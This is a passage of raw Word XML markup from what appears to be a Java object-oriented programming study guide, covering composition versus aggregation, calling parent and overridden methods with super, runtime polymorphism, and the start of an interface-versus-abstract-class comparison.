          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a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M</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rd Drive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Composition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE3101B" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Each component works independently and can be replaced or upgraded without changing the entire Computer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4C1F4" w14:textId="153291F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F03BCA">
          <v:rect id="_x0000_i1320" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25EE62" w14:textId="626E6808" w:rsidR="00743C37" w:rsidRPr="00CE4B95" w:rsidRDefault="00743C37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc197867330"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00283099"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mposition and </w:t>
      </w:r>
      <w:r w:rsidR="00283099" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ggregation?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="6E5D8500" w14:textId="4B11DFC3" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00F9775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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C43D9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has-a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477AEB85"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ly coupled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA3338"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not exist without</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BC66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is also destroyed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C766BAD"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60DB00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eart {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626D0D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pump() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2688D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art is pumping...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C9D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22CC8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0C818D" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD2CE65"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uman {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3544E02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Heart heart = new Heart(); // Composition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58A58B" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D389C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live() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63589D2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rt.pump();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599204E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uman is alive");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D24DE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2B3A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B25A91"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Human has a Heart</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if the Human object is destroyed, the Heart has no meaning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B494B28"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10708">
          <v:rect id="_x0000_i1321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D53F9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ggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F603BD"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eak "has-a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA28C1"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ly coupled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA2557"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 exist independently</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A776168"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can still exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0B4B6"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781937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partment {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310324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0ABA89A" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3470115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artment(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56C21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D61247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05B26"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2049A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University {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB691D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List&lt;Department&gt; departments;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006B157" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCE193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versity(List&lt;Department&gt; departments) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA3F2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epartments = departments;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A46864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9A1F0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A5CD4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University has Departments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — but even if the University object is deleted, the Department objects can still exist elsewhere or be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFEB96"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A794D2">
          <v:rect id="_x0000_i1322" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BDC371"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254"/>
        <w:gridCol w:w="2561"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="118FCA6E" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BFF99BE"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7BA0A1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7227FD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ggregation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="033A437E" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5455979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72A4FC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has-a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8158D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ak "has-a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="69EF5EF4" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D3BF74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089B1EA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7B300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r>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="1A64D6A2" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F1A96A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5A1145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depends on parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63ADB77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independent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="15396031" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="298ABC6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4A69793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uman has a Heart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B5BA0E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versity has Departments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="025A9995" w14:textId="37CC8431"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4E8EE3">
          <v:rect id="_x0000_i1323" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD242B1" w14:textId="77777777" w:rsidR="00743C37" w:rsidRPr="00CE4B95" w:rsidRDefault="00743C37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc197867331"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Parent and child class methods and how to access those?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="2716EC9E" w14:textId="77C93A76" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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heritance Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358036F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a class (Child) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> another class (Parent), it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all non-private methods and variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C8E20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3F948AB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4099D2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method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EC5F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6E23D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610FDF" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAABD0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74224EF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33B637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method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864C0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4CE9E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B51E4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D69885">
          <v:rect id="_x0000_i1324" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68584756"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ccessing Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5A681"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ccessing Parent Method from Child Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC16AC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032AD5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Parent method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F7E5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 method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E6AA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Accessing Overridden Parent Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE8F77"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ild overrides a parent method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662996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7FA2ED3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28731BB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show()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FA1E8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71267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D5069" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6862BA4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2E91835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F67C3D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AD114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7202D2D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5F31A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01ED9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2104FD7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Child show() — overridden version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DAEC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A6046C">
          <v:rect id="_x0000_i1325" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7DB1F"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alling Parent’s Version Using super</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418DF64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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent’s method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the child:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2DB63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3AB5480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79A31B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5171A07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show(); // Calls parent show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2568B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292F27D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9655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5261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7185685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show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600DE7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show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A638E05"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4A8D5">
          <v:rect id="_x0000_i1326" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C02ED"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Accessing Child and Parent Methods Separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718FEE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Parent();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F80F0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Parent method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6660D5" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419D8F9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54996C6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show();    // Overridden method in Child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0137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s own method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56AB18"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DC81F">
          <v:rect id="_x0000_i1327" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE97C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Polymorphism (Reference of Parent, Object of Child)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4181E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Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20BE1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Calls Child's overridden method (runtime polymorphism)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928CC3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 error (method not in Parent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F811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all display():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52776BA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afe after type casting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68BC1B"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337D0">
          <v:rect id="_x0000_i1328" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F052FA0"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4330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="2AD66E85" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7500E27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3DFCEB2A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="1A521DC5" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5AA9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methods in Child</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="543898F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directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="3F0B6268" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B4CCBB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den method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2FC0F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s version takes priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="6BED641E" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32CB07F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 Parent’s method inside Child</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31FDAD4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methodName()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="2EB2A101" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D26BF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lymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2283A0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reference calls overridden methods only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D9D1F46" w14:textId="4283F448"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EA45C8">
          <v:rect id="_x0000_i1329" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47489929" w14:textId="71063328" w:rsidR="00273F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="00273F1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc197867332"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between interface and abstract class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="0F3AA869" w14:textId="6664DE28" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">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564"/>
        <w:gridCol w:w="5002"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="34539375" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="585B812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75F00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C8563D4"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FD07B0" w:rsidRPr="00CE4B95" w14:paraId="56A1D7AF" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="054CC85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Relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DAFA85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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D93A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s"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="6F93119F" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
